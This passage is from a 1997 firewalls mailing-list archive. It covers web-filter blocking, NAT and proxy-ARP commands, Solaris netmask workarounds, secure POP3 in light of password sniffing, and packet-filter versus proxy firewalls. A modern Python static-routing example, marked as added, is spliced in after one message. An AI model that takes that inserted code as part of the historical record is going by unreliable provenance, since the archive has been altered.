this is for LAN/WAN access, not dial-in) > >Why would the environment have much to do with it? FW1 or TIS Gauntlet >come with support for Secure/ID, you can have your employees get these >cards, and authenticate against the Firewall. You can then set a >user-by-user policy as to what they are allowed access to, and how long >they can access it for. > >-- >Daniel G. Drumm - ddrumm@rush.edu >Rush Presbyterian St. Luke's Medical Center - Chicago, IL >Network Division - Information Services > > From owner-firewalls-outgoing Tue Jun 3 12:45:25 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA03214 for firewalls-outgoing; Tue, 3 Jun 1997 12:32:24 -0700 (PDT) Received: from omsk.quadrix.com (omsk.quadrix.com [208.210.34.65]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id MAA03196 for ; Tue, 3 Jun 1997 12:32:14 -0700 (PDT) Received: from jukyu.quadrix.com by omsk.quadrix.com (4.1/SMI-4.1) id AA17678; Tue, 3 Jun 97 15:35:18 EDT Date: Tue, 3 Jun 97 15:35:17 EDT Message-Id: <9706031935.AA17678@omsk.quadrix.com> From: Bill Van Emburg To: ss1011@bbtnet.com Subject: RE: Does Raptor WebNOT Block Legitimate Sites? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I don't think you meant to send this to the firewalls list, but I'll offer you some info anyway.... Date: Mon, 2 Jun 1997 15:19:12 -0400 From: Tim Thayer Allen, any movement on this issue? We are still getting complaints from users. The most recent was URL: www.emeregency.com Tim Thayer -------------------------------- >Date: Tue, 11 Mar 1997 08:21:10 -0500 (EST) >From: Allen Rogers >Subject: Re: Does Raptor WebNOT Block Legitimate Sites? > > >This is a list that Raptor licenses directly from Microsystems. The actual >URLs used, and their abbreviated nature, is due to how Microsystems chooses >to create their list. 
I am trying to open a formal path where our customers >can present queries/requests to them directly for particular sites. I will >keep you posted. > The problem is, as was mentioned in the part of the message I deleted, that the URLs are truncated. All the filtering services have their problems, this is one of the bigger ones. Sometimes, sites also get blocked because they are critical of the filtering companies.... In any case, visit: http://cgi.pathfinder.com/@@qO5IngUAPMqarMCj/netly/spoofcentral/censored/ They will give you some more info, and also the ability to check whether a particular site is blocked by several of the most common filtering programs. -- -- Bill Van Emburg Phone: 908-235-2335 Quadrix Solutions, Inc. Fax: 908-235-2336 (bve@quadrix.com) Check out http://yourtown.com! (http://quadrix.com) "You do what you want, and if you didn't, you don't" From owner-firewalls-outgoing Tue Jun 3 14:03:22 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA08744 for firewalls-outgoing; Tue, 3 Jun 1997 13:31:09 -0700 (PDT) Received: from cih-gw.cih.com ([204.69.206.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA08670 for ; Tue, 3 Jun 1997 13:30:51 -0700 (PDT) Received: (from mail@localhost) by cih-gw.cih.com (8.7.6/8.6.9) id QAA30042; Tue, 3 Jun 1997 16:35:40 -0400 X-Authentication-Warning: cih-gw.cih.com: mail set sender to using -f Received: from cih-gw.cih.com(204.69.206.1) via SMTP by cih-gw.cih.com, id smtpd30040aaa; Tue Jun 3 20:35:36 1997 Date: Tue, 3 Jun 1997 16:35:36 -0400 (EDT) From: "Craig I. Hagan" Reply-To: hagan@cih.com To: Srinivas Yalavarthy cc: fwtk-users@tis.com, firewalls@GreatCircle.COM Subject: Re: Blocking unwanted junk mail using FWTK In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Hi, > > I would like to know if it's possible to block junk mail > using "smap" in FWTK 2.0. 
> > If anybody has done this before, I would appreciate it if you can share > it with me. check out http://www.cih.com/~hagan/smap-hacks does exactly what you are looking for (i think). -- craig ------------------------------------------------------------------------------- Craig I. Hagan "It's a small world, but I wouldn't want to back it up" hagan@cih.com "True hackers don't die, their ttl expires" "It takes a village to raise an idiot, but an idiot can raze a village" From owner-firewalls-outgoing Tue Jun 3 14:16:09 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA13102 for firewalls-outgoing; Tue, 3 Jun 1997 14:10:57 -0700 (PDT) Received: from libofmich.lib.mi.us (libofmich.lib.mi.us [198.109.128.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA13092 for ; Tue, 3 Jun 1997 14:10:51 -0700 (PDT) Received: by libofmich.lib.mi.us (AIX 3.2/UCB 5.64/4.03) id AA41995; Tue, 3 Jun 1997 17:16:44 -0400 Date: Tue, 3 Jun 1997 17:16:44 -0400 (EDT) From: "Amy (Cremer) Briggs" To: firewalls@greatcircle.com Subject: Solaris Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk First of all, if there is a better list to post this to please let me know. I've checked out Sun's web site and didn't find any mention of a Solaris listserv. Does anyone know how you can trick a Solaris box into treating a class C address as a class B? For example we want to use 2xx.xx.0.0 as a class B address. I've entered the class B subnet mask for this network in the /etc/netmasks file, which is how I thought you could do it, but it isn't working for me. It still thinks it's a class C address and won't route properly if I set up my routes using it as a class B address.
Finding a way to make this work would save me hours of time because I have 5 full class B (technically class C) networks to do this for, and entering all the class C's within all 5 class B's would take me a while as well as complicate my routing table. Thanks for any help or information you can give me. Amy \\\\\\\\\\\\\\Amy Briggs Microcomputer Support Specialist/////////////// Library of Michigan amyc@libofmich.lib.mi.us \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\//////////////////////////////////////////// ** It's not what you've got, it's what you give--TESLA ** From owner-firewalls-outgoing Tue Jun 3 15:00:19 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA15802 for firewalls-outgoing; Tue, 3 Jun 1997 14:41:47 -0700 (PDT) Received: from snoopy.hypercon.com (mail2.concom.com [198.64.246.149]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id OAA15770 for ; Tue, 3 Jun 1997 14:41:38 -0700 (PDT) Received: from pitbull.ep.hess.com ([207.51.255.129]) by snoopy.hypercon.com (post.office MTA v1.9.1 ID# 0-11151) with SMTP id AAA164 for ; Tue, 3 Jun 1997 16:48:09 -0500 Received: from hac31d.ep.hess.com ([15.43.4.161]) by pitbull.ep.hess.com via smtpd (for mail2.concom.com [198.64.246.149]) with SMTP; 3 Jun 1997 21:45:09 UT Message-ID: <3394907A.42F9@hypercon.com> Date: Tue, 03 Jun 1997 16:45:30 -0500 From: msquared Reply-To: msquared@hypercon.com X-Mailer: Mozilla 3.0 (Win95; U) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: RAPTOR WEBNOT SITE BLOCKING Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk It was written: " >From: Allen Rogers >Subject: Re: Does Raptor WebNOT Block Legitimate Sites? > > >This is a list that Raptor licenses directly from Microsystems. The actual >URLs used, and their abbreviated nature, is due to how Microsystems chooses >to create their list.
I am trying to open a formal path where our customers >can present queries/requests to them directly for particular sites. I will >keep you posted." >CyberPatrol gives two forms at their site for 1) adding a site to the list of blocked sites - http://www.microsys.com/cybernot/form_add.htm or 2) removing a site from the list - http://www.microsys.com/cybernot/form_rev.htm. I've seen them take action in as little as two hours. They have always responded the next business day with a confirming mail note. Mike From owner-firewalls-outgoing Tue Jun 3 16:02:08 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id PAA19417 for firewalls-outgoing; Tue, 3 Jun 1997 15:06:32 -0700 (PDT) Received: from ren.globecomm.net (ren.globecomm.net [207.51.48.3]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id PAA19383 for ; Tue, 3 Jun 1997 15:06:22 -0700 (PDT) Received: from chiba (syd2-ppp-131.tpgi.com.au [203.29.157.131]) by ren.globecomm.net (8.8.5/8.8.0) with SMTP id SAA19560 for ; Tue, 3 Jun 1997 18:09:53 -0400 (EDT) Date: Tue, 3 Jun 1997 08:10:31 +1000 (EST) From: Warpy To: firewalls@GreatCircle.COM Subject: Secure Pop3? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Following on in the same thread as my last question, I have seen that one of the best sources of clear text logins and passwords is people accessing POP3 (while a sniffer is running, in this case "linsniff"). Is there a secure POP3 "getmail" program available, or a way I can implement existing secure transfer programs (such as ssh) with *nix based POP3 mail grabber programs?
Warpy From owner-firewalls-outgoing Tue Jun 3 16:41:26 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id QAA00115 for firewalls-outgoing; Tue, 3 Jun 1997 16:13:33 -0700 (PDT) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id QAA00104 for ; Tue, 3 Jun 1997 16:13:26 -0700 (PDT) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0wZ2os-0004J0C (Debian Smail-3.2 1996-Jul-4 #2); Wed, 4 Jun 1997 01:16:50 +0200 (MET DST) Received: from lina.inka.de (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Wed, 4 Jun 97 01:16 MET DST Received: by lina.inka.de id m0wZ2kO-00014MC (Debian Smail-3.2 1996-Jul-4 #2); Wed, 4 Jun 1997 01:12:12 +0200 (CEST) Message-Id: Date: Wed, 4 Jun 1997 01:12:10 +0200 From: Bernd Eckenfels To: David Lang Cc: firewalls@greatcircle.com Subject: Re: NAT on linux firewall? References: <199706031744.KAA06986@mail.diginsite.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.67 In-Reply-To: <199706031744.KAA06986@mail.diginsite.com>; from David Lang on Tue, Jun 03, 1997 at 09:45:44AM -0700 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, On Jun 3, David Lang wrote > for each web site do the following: > setup the alias > > ifconfig eth0:2 200.200.200.2 You don't need that alias device; it's enough (and much better) to use proxy ARP with the following single command:

    arp -s 200.200.200.0 xx:xx:xx:xx:xx:xx netmask 255.255.255.0 pub

(with xx:xx:xx:xx:xx:xx being the ethernet address of your network card). > setup an input firewall filter (I created a file rc.fw that I run after > rc.inet1) Instead you can use a modified transproxy or netcat. Hmm, will look into this.
I think with iproute and 2.1 kernels you can do the same thing: iproute addrule to 200.200.200 nat 100.100.100 Greetings Bernd -- (OO) -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de -- ( .. ) ecki@{inka.de,linux.de,debian.org} http://home.pages.de/~eckes/ o--o *plush* 2048/93600EFD eckes@irc +4972573817 BE5-RIPE (O____O) If privacy is outlawed only Outlaws have privacy From owner-firewalls-outgoing Tue Jun 3 17:11:41 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id QAA06126 for firewalls-outgoing; Tue, 3 Jun 1997 16:57:59 -0700 (PDT) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id QAA05349 for ; Tue, 3 Jun 1997 16:50:36 -0700 (PDT) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0wZ3On-0004J0C (Debian Smail-3.2 1996-Jul-4 #2); Wed, 4 Jun 1997 01:53:57 +0200 (MET DST) Received: from lina.inka.de (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Wed, 4 Jun 97 01:53 MET DST Received: by lina.inka.de id m0wZ3Jq-00014MC (Debian Smail-3.2 1996-Jul-4 #2); Wed, 4 Jun 1997 01:48:50 +0200 (CEST) Message-Id: Date: Wed, 4 Jun 1997 01:48:48 +0200 From: Bernd Eckenfels To: David Lang , firewalls@greatcircle.com Cc: Bernd Eckenfels Subject: Re: NAT on linux firewall? References: <199706032327.QAA07588@mail.diginsite.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.67 In-Reply-To: <199706032327.QAA07588@mail.diginsite.com>; from David Lang on Tue, Jun 03, 1997 at 03:28:13PM -0700 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, > where can I get info on iproute? is that something new in the 2.1 kernels? Yes, 2.1.x (x>15) ships with linux/Documentation/networking/ policy-routing.txt and routing.txt. which describes the new features briefly. 
iproute can be obtained from any Debian GNU/Linux mirror (ftp.debian.org:/debian/bo/source/net) as iproute_961225-2.tar.gz. (Transproxy is there, too, in transproxy_0.2.orig.tar.gz.) I found another solution which does not need ipfwadm and plug-gw, using transproxy instead:

    arp -s 200.200.200.0 xx:xx:xx:xx:xx:xx netmask 255.255.255.0 pub
    route add -net 200.200.200.0 netmask 255.255.255.0 dev lo
    tproxyd -t -b 200.200.200.2 -s 80 -r nobody 100.100.100.2 80
    ...
    tproxyd -t -b 200.200.200.254 -s 80 -r nobody 100.100.100.254 80

BTW: you don't need to use 200 different IP addresses for the WWW servers. You can run multiple WWW servers on different ports:

    tproxyd -t -b 200.200.200.2 -s 80 -r nobody 100.100.100.2 80
    ...
    tproxyd -t -b 200.200.200.254 -s 80 -r nobody 100.100.100.2 334

Greetings Bernd PS: with a patch to transproxy, simple translation tables will allow you to run only one tproxyd server instance. -- (OO) -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de -- ( .. ) ecki@{inka.de,linux.de,debian.org} http://home.pages.de/~eckes/ o--o *plush* 2048/93600EFD eckes@irc +4972573817 BE5-RIPE (O____O) If privacy is outlawed only Outlaws have privacy From owner-firewalls-outgoing Tue Jun 3 17:41:14 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA09189 for firewalls-outgoing; Tue, 3 Jun 1997 17:18:00 -0700 (PDT) Received: from access2.digex.net (access2.digex.net [205.197.245.193]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id RAA09168 for ; Tue, 3 Jun 1997 17:17:49 -0700 (PDT) Received: from localhost (brads@localhost) by access2.digex.net (8.8.4/8.8.4) with SMTP id UAA26995; Tue, 3 Jun 1997 20:21:27 -0400 (EDT) Date: Tue, 3 Jun 1997 20:21:26 -0400 (EDT) From: Bradley Smith To: Warpy cc: firewalls@GreatCircle.COM Subject: Re: Secure Pop3? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Try the APOP option..
Granted, it's not much, but it's better than cleartext. Alternatively, if you're into S&M you could kerberize it :-) Or, you could go to something like S/Key or SecurID. -brad On Tue, 3 Jun 1997, Warpy wrote: > Following on in the same thread of my last question, I have seen that one > of the best sources of clear text logins and passwords to be from people > accessing pop3 (while a sniffer is running, in this case "linsniff"). Is > there a secure pop3 "getmail" program available, or a way i can implement > existing secure transfer programs (such as ssh) with *nix based pop3 mail > grabber programs? > > Warpy > > From owner-firewalls-outgoing Tue Jun 3 17:58:46 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA11488 for firewalls-outgoing; Tue, 3 Jun 1997 17:31:57 -0700 (PDT) Received: from sge.net (krystal.sge.net [152.91.9.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id RAA11459 for ; Tue, 3 Jun 1997 17:31:47 -0700 (PDT) Received: by sge.net; id KAA10959; Wed, 4 Jun 1997 10:35:23 +1000 (EST) Received: from zirconia.sge.net(10.1.1.6) by krystal.sge.net via smap (3.2) id xma010909; Wed, 4 Jun 97 10:35:00 +1000 Received: by zirconia.sge.net; id KAA24966; Wed, 4 Jun 1997 10:35:00 +1000 (EST) Received: from ns2.dpie.gov.au(152.91.195.1) by zirconia.sge.net via smap (3.2) id xma024855; Wed, 4 Jun 97 10:34:31 +1000 Received: (from news@localhost) by conargo.dpie.gov.au id KAA20586 (8.6.11/IDA-1.6); Wed, 4 Jun 1997 10:34:30 +1000 X-Organisation: Department of Primary Industries and Energy X-Url: http://www.dpie.gov.au/ X-Notice: Views expressed by this message are not necessarily those of the Department of Primary Industries and Energy or of the Government of the Commonwealth of Australia. To: firewalls@greatcircle.com Path: usenet From: Gavin Longmuir Newsgroups: maillist.comp.firewalls Subject: Re: SSH Equiv for FTP? 
Date: Wed, 04 Jun 1997 10:34:29 +1000 Organization: Commonwealth Department of Primary Industries and Energy http://www.dpie.gov.au/ Lines: 20 Message-ID: <3394B815.6EE1@dpie.gov.au> References: <5n0mn6$74a@conargo.dpie.gov.au> NNTP-Posting-Host: 152.91.194.1 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Mailer: Mozilla 3.01 (X11; I; SunOS 5.4 sun4m) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ArkanoiD wrote: > > nuqneH, > > > > > I was wondering whether there was an equivalent to SSH for ftp. Does > > anyone know if there is? > > > You can use ftp over ssh with port forwarding feature.. > Try rsync using ssh as the transport method. A technical paper can be found at http://cs.anu.edu.au/techreports/1996/TR-CS-96-05.html Gavin -- Gavin Longmuir - Internet Applications and Platforms Manager Information Management and Services Branch Commonwealth Department of Primary Industries and Energy Voice:+61 6 271 6486 FAX:+61 6 272 4997 mailto:Gavin.Longmuir@dpie.gov.au From owner-firewalls-outgoing Wed Jun 4 01:00:29 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA11070 for firewalls-outgoing; Wed, 4 Jun 1997 00:58:14 -0700 (PDT) Received: from pdx.com.my (pdx.com.my [192.228.144.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id AAA11046 for ; Wed, 4 Jun 1997 00:58:04 -0700 (PDT) Received: from wsm.pdx.com.my by pdx.com.my with smtp (Smail3.1.29.1 #3) id m0wZAu3-000BGFC; Wed, 4 Jun 97 15:54 GMT+0800 Message-ID: <3395210C.7EAF@pdx.com.my> Date: Wed, 04 Jun 1997 16:02:20 +0800 From: Wong Organization: CSNet X-Mailer: Mozilla 3.0Gold (Win95; I) MIME-Version: 1.0 To: "Kohn, Joav" , Mariko Yashada CC: firewalls@greatcircle.com Subject: Re: ISP Connection References: <0C673F68C3A0D011A94208002BE526253524@USBGREXCH01> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 2 June
1997, Kohn, Joav wrote: > > unless you have a screening router (or proxy server, or firewall) at > your end, you have no security at all. just cause the direct route to > your network is hidden doesn't give you any security. if it made it > impossible for the internet to reach you, none of your internet requests > would ever get back to you. > > no matter how you go, ISP or MCI/SPRINT/ATT, you still need to get some > type of protection on your end, under your control. after all, would you > want to bank your company on your internet provider? > > > > On 2 June 1997, Mariko Yashada wrote: > > > > > > > > > My company is currently getting Internet access through a local ISP, using > > > PPP connections. We are now considering replacing the dial-up connections > > > with a leased line to the ISP. We will leave our web server at the ISP and > > > will continue to use their e-mail server. There will be a router at the ISP > > > end of the line. The line will connect to our Enterprise Network through a > > > router at our end. We will also put a proxy server at our end to filter out > > > going access and do NAT. > > > > > > The ISP people say this type of connection is more secure than a direct > > > connection to the Internet through say MCI, becuase our router will be > > > "hidden" behind their routing system. The IP address of our router will not > > > be accessable from outside the ISP domain. > > > > > > We will not allow incomming connections such as telnet or ftp. We will > > > restrict access from inside the company to e-mail, http, ftp and probably > > > audio. > > > > > > My question is, how secure is this type of connection? How difficult is it > > > for someone outside the ISP domain to discover and access our connection? > > > > > > Thanks, > > > > > > Mariko > > > Hi Pals! I agree with what Kohn said in his first paragraph, last line. By the way Kohn, she mentioned that she will be using a proxy server in her first paragraph. 1. 
Your router is "hidden", because both your router and your ISP's router will not broadcast any routing tables between themselves. This is a normal configuration, since there are so many routers in the Internet, and surely your router cannot store them in its cache. a. You will define a static route (or a default gateway) with the address of your ISP's router and a metric of one in your router, and your ISP also will add a static route in their router to point to your router. Whenever your router receives any packet destined for 0.0.0.0, it will be forwarded to your ISP's router. b. You will disable "talk" and "listen" on your router. So your internal LAN will not be broadcasted to the Internet, and your router will not receive any routing updates. This is why you would have to add a static route in your router. 2. A proxy server alone is not enough to protect your LAN. You will need more than that, for example, a packet filter, an application filter or a full firewall. 3. Anyone can still know your LAN's network address, just by ping-ing your proxy server or DNS (eg. ping grfn.org instead of the normal "ping x.x.x.x"). You can see the IP address in the reply packet (unless you install a firewall and disable the ICMP echo reply function). Regards. Wong. 
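For Wong's point 1a above, here is an added example, not code from his post or from any router vendor: a small static forwarding table with longest-prefix-match lookup, written in Python. All addresses and next hops are made-up documentation ranges. It shows that the 0.0.0.0/0 entry catches every destination no more specific route covers, that the ISP side needs its own static route back (his point 1a), and that a router with routing updates disabled and no default route (his point 1b without the static route) simply cannot reach anything off the LAN.

```python
# Added example, not code from Wong's post or from any router vendor: a
# minimal static forwarding table with longest-prefix-match lookup.
# Addresses are documentation ranges (RFC 5737) chosen for illustration.
from ipaddress import IPv4Network, ip_address, ip_network
from typing import List, Optional, Tuple

Route = Tuple[IPv4Network, str, int]   # (destination prefix, next hop, metric)


class StaticTable:
    """A router with routing updates disabled: it knows only what was typed in."""

    def __init__(self) -> None:
        self.routes: List[Route] = []

    def add(self, prefix: str, next_hop: str, metric: int = 1) -> None:
        self.routes.append((ip_network(prefix), next_hop, metric))

    def lookup(self, dst: str) -> Optional[str]:
        """Longest matching prefix wins; on equal length the lower metric wins."""
        target = ip_address(dst)
        best_key, best_hop = None, None
        for net, hop, metric in self.routes:
            if target in net:
                key = (net.prefixlen, -metric)
                if best_key is None or key > best_key:
                    best_key, best_hop = key, hop
        return best_hop


def customer_router(with_default: bool = True) -> StaticTable:
    """Customer side of Wong's 1a: LAN directly connected, default to the ISP router."""
    t = StaticTable()
    t.add("192.0.2.0/24", "direct")                       # the company LAN (assumed)
    if with_default:
        t.add("0.0.0.0/0", "198.51.100.1", metric=1)       # static default -> ISP router
    return t


def isp_router() -> StaticTable:
    """ISP side of 1a: a static route back to the customer, everything else upstream."""
    t = StaticTable()
    t.add("192.0.2.0/24", "198.51.100.2")    # customer's router on the leased line (assumed)
    t.add("0.0.0.0/0", "upstream")
    return t


def forward(table: StaticTable, dst: str) -> str:
    """Next hop for a packet to dst, or 'drop' when no entry covers it."""
    hop = table.lookup(dst)
    return hop if hop is not None else "drop"


if __name__ == "__main__":
    cust = customer_router()
    for dst in ("192.0.2.7", "203.0.113.9"):
        print(f"customer -> {dst}: {forward(cust, dst)}")
    print("customer without default -> 203.0.113.9:",
          forward(customer_router(False), "203.0.113.9"))
    print("isp -> 192.0.2.7:", forward(isp_router(), "192.0.2.7"))
```

The lookup is deliberately the dumbest correct thing: a linear scan keeping the longest prefix, with metric as tie-breaker, which is all a two-entry table needs. Note that "hidden" here only means nothing is advertised; the customer LAN is still fully routable from the ISP side, which is Wong's point 3.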
From owner-firewalls-outgoing Wed Jun 4 01:45:28 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id BAA13884 for firewalls-outgoing; Wed, 4 Jun 1997 01:29:47 -0700 (PDT)
Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id BAA13810 for ; Wed, 4 Jun 1997 01:29:28 -0700 (PDT)
Received: from scorpian.europe.dg.com by dg-rtp.dg.com (5.4R3.10/dg-rtp-v02) id AA16562; Wed, 4 Jun 1997 04:32:50 -0400
Received: from speedy.europe.dg.com by scorpian.europe.dg.com (5.4R3.00/dg-s04) id AA24703; Wed, 4 Jun 1997 09:32:42 +0100
Received: from pcpedro by speedy.europe.dg.com (8.6.13/200.2.1.5) id JAA12778; Wed, 4 Jun 1997 09:32:22 GMT
Received: by pcpedro with Microsoft Mail id <01BC70CA.41A88880@pcpedro>; Wed, 4 Jun 1997 09:32:44 +0100
Message-Id: <01BC70CA.41A88880@pcpedro>
From: Pedro Salgueiro
To: "'Mike Jones'"
Cc: "'firewalls'"
Subject: RE: PIX and Firewall-1
Date: Wed, 4 Jun 1997 09:29:35 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi to all,

I've been "watching" the discussion regarding the differences between packet-filtering and application level firewalls. I believe that there are some:

1 - Packet filtering firewalls are more difficult to manage (it is very simple to mis-configure => less secure). It may be very complicated establishing rules.

2 - Packet filter systems are always routing packets (so "fail-open" may occur). A well known constructor's firewall crashed with a ping attack and routed all the packets from the insecure network to the secure one.

3 - If you are using a packet filter system and you provide SMTP, HTTP, etc. you cannot control what the users do with those protocols, i.e., you open or close a port. Application level firewalls provide secure daemons for those protocols.

Regards,

Pedro Salgueiro
Data General Portugal
Tel. +351 - 1 - 4129600
Fax. +351 - 1 - 4129699
mailto:psalgueiro@pt.europe.dg.com
R. Dr. António Loureiro Borges nº2
Arquiparque - Miraflores
1495 Algés
Portugal
______________________________________________
"Don't take life too serious, no one gets out alive!!!! :-)"
* These are my own opinions and do not reflect those of the company *

----------
From: Mike Jones
Sent: Wednesday, 4 June 1997 8:55
To: mfiocchi@otm.it; firewalls@GreatCircle.COM; carlsonp@sprynet.com
Subject: Re: PIX and Firewall-1

Peter Carlson writes....

> There are many comparisons made by datacomm, lan times, ziff-davis and
> others. Keep in mind that both pix and fw-1 are glorified packet filters,
> even though they have a fancy name for it. I would stick with an
> application level gateway. They are well accepted and known for being more
> secure.

Many things are known that aren't so. This claim comes by periodically in this forum, and I have yet to get an answer to this question: in what way are application level gateways more secure than, say, FW-1 or PIX? There are certainly capabilities that can be provided via application proxies that can't be provided by any filter-based technologies, but what types of attacks are a FW-1 or a PIX vulnerable to that application proxies aren't?

--
Mike Jones
Sr.
Technology Advisor
UNIFIED Technologies

From owner-firewalls-outgoing Wed Jun 4 02:00:15 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id BAA14903 for firewalls-outgoing; Wed, 4 Jun 1997 01:41:11 -0700 (PDT)
Received: from glacier.wise.edt.ericsson.se (glacier-ext.wise.edt.ericsson.se [193.180.251.38]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id BAA14870 for ; Wed, 4 Jun 1997 01:40:55 -0700 (PDT)
Received: from geek (geek.nmac.ericsson.se [130.100.187.83]) by glacier.wise.edt.ericsson.se (8.7.5/8.7.3/glacier-0.9) with ESMTP id KAA16357 for ; Wed, 4 Jun 1997 10:44:14 +0200 (MET DST)
Received: from haig.oplab.nmac.ericsson.se (haig.oplab.nmac.ericsson.se [130.100.187.85]) by geek (8.8.5/8.8.5) with ESMTP id IAA27126 for ; Wed, 4 Jun 1997 08:45:53 +0200
Received: by haig.oplab.nmac.ericsson.se with Internet Mail Service (5.0.1457.3) id ; Wed, 4 Jun 1997 10:44:00 +0200
Message-ID: <43BED8177D10D011A69A0800092C15D7011BFA@haig.oplab.nmac.ericsson.se>
From: Robert Ståhlbrand
To: "'Amy (Cremer) Briggs'"
Cc: "'firewalls@greatcircle.com'"
Subject: RE: Solaris
Date: Wed, 4 Jun 1997 10:43:57 +0200
X-Priority: 3
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.0.1457.3)
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I had this problem too and it really is confusing that editing /etc/netmasks doesn't fix it. My way around this was to edit /etc/rc2.d/S72inetsvc with a line that reconfigures the interface like:

ifconfig le0 112.140.0.0 netmask 255.255.0.0 broadcast 112.140.255.255 -trailers up

I know that this isn't a very cute way to solve the problem but I tried a lot and couldn't think of anything else than to reconfigure the network interface when I booted.

Robert Ståhlbrand
Network-, System-responsible NMAC and OPLAB domains.
Ericsson Telecom AB
Box 333, Flöjelbergsgatan 1C
43124 Mölndal
Phone number +46 31 7476162
Fax number +46 31 7473777
Email: robert.stahlbrand@nmac.ericsson.se

> -----Original Message-----
> From: Amy (Cremer) Briggs [SMTP:amyc@libofmich.lib.mi.us]
> Sent: 3 June 1997 23:17
> To: firewalls@GreatCircle.COM
> Subject: Solaris
>
> First of all if there is a better list to post this to please let me
> know. I've checked out Suns web site and didn't find any mention of a
> Solaris listserv.
>
> Does anyone know how you can trick a Solaris box into treating a class C
> address as a class B. For example we want to use 2xx.xx.0.0 as a class B
> address. I've entered the class B subnet mask for this network in the
> /etc/netmasks file which is how I thought you could do it but it isn't
> working for me. It still thinks it's a class C address and won't route
> properly if I set up my routes using it as a class B address. Finding a
> way to make this work would save me hours of time because I have 5 full
> class B (technically class C) networks to do this for and entering all
> the class C's within all 5 class B's would take me awhile as well as
> complicate my routing table.
>
> Thanks for any help or information you can give me.
>
> Amy
>
> \\\\\\\\\\\\\\ Amy Briggs, Microcomputer Support Specialist ///////////////
> Library of Michigan      amyc@libofmich.lib.mi.us
> ** It's not what you've got, it's what you give -- TESLA **

From owner-firewalls-outgoing Wed Jun 4 04:00:20 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id DAA00408 for firewalls-outgoing; Wed, 4 Jun 1997 03:58:29 -0700 (PDT)
Received: from reflections.eng.mindspring.net (reflections.eng.mindspring.net [207.69.183.9]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id DAA00394 for ; Wed, 4 Jun 1997 03:58:18 -0700 (PDT)
Received: (qmail 1753 invoked by uid 514); 4 Jun 1997 11:01:59 -0000
